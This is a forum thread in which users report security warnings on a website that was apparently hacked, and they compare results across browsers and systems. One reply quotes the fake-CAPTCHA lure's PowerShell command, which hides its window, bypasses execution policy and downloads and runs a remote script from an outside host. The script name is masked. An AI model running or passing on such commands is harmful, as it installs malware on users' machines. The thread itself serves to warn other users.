Dangerous Site?

My Brave browser now flags this site as “Dangerous” and may try to install malware. Anyone else getting this message? Oddly, it seems to appear on only one of my computers, running MX Linux. One running Linux Mint and Brave loads normally. Weird.

Edit: Now Brave blocks it on both computers. Will try other browsers. Stay tuned…

Yep I see a page that says warning.

Grabbed a screenshot of it..

Same here.

I got either the red page or a “500 internal server error” when using Brave, Firefox, Librewolf, Ungoogled Chromium, or Vivaldi browsers. All under various Linux OS. I don’t use Windows on anything.

Obviously, one can bypass the red page but not the 500 error.

Getting no warnings using Microsoft Edge, Windows 11, and Microsoft Defender.

I’m using the same but sometimes I get a ‘Blue oval with verbiage in it’ at the end of the post and it says something about fishing so I checked it out and then more links after that. I didn’t go there.

I’m getting it on my iPhone as well last two times !!

Got a need to verify you are a human screen and then a list of three instructions to press window+R

then to paste the expression below in the Run prompt and hit enter to execute. Doing so would bypass built in window security controls and allow a file to load directly to memory and run hidden from a user. Clearly not a good idea so i did not try to proceed to get on to this site at around 7:30pm. Try again at 9:15pm and did not get the same verification screen.

I altered the remote script file name by changing it to X’s so no one gets hurt if they copy and try to run!!! Don’t know who the IT admins to send this to investigate or be aware of.

Always suspicious seeing “bypass” and “iex” invoke expression from an unknown website.

powershell -w h -ep bypass -c “iex((iwr ‘https://sail.autolabsouthgate.com/XXXXXX.ps1’ -UseBasicParsing -UserAgent ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36’).Content)”

Thanks, talyn. That fake CAPTCHA script is a bitch for Windows users. That’s one of many reasons I abandoned Windows years ago.

Same here !!!

Getting it also, finding that it only happens on Apple products. I have an iPhone and check it on my wife’s Apple computer desktop. It doesn’t on my windows operating system desktop.

No, it’s showing up on all operating systems and browsers, AFAIK. I suspect that this site’s security certificate has lapsed. The boffins should be working on it.

Yep, get it on phone and tablet

I contacted Admin the day it started, they said they were trying to find out where the hack came from, so I guess until they find it, we will see these alerts.

It looks like the back room boffins have this fixed. Sincere thanks to them.

My Brave browser had that for one day then it went away on its own. Strange. Anyone know why this happened?

Just two replies above your reply, I posted what happened. The site was hacked and they were trying to figure out where it came from.
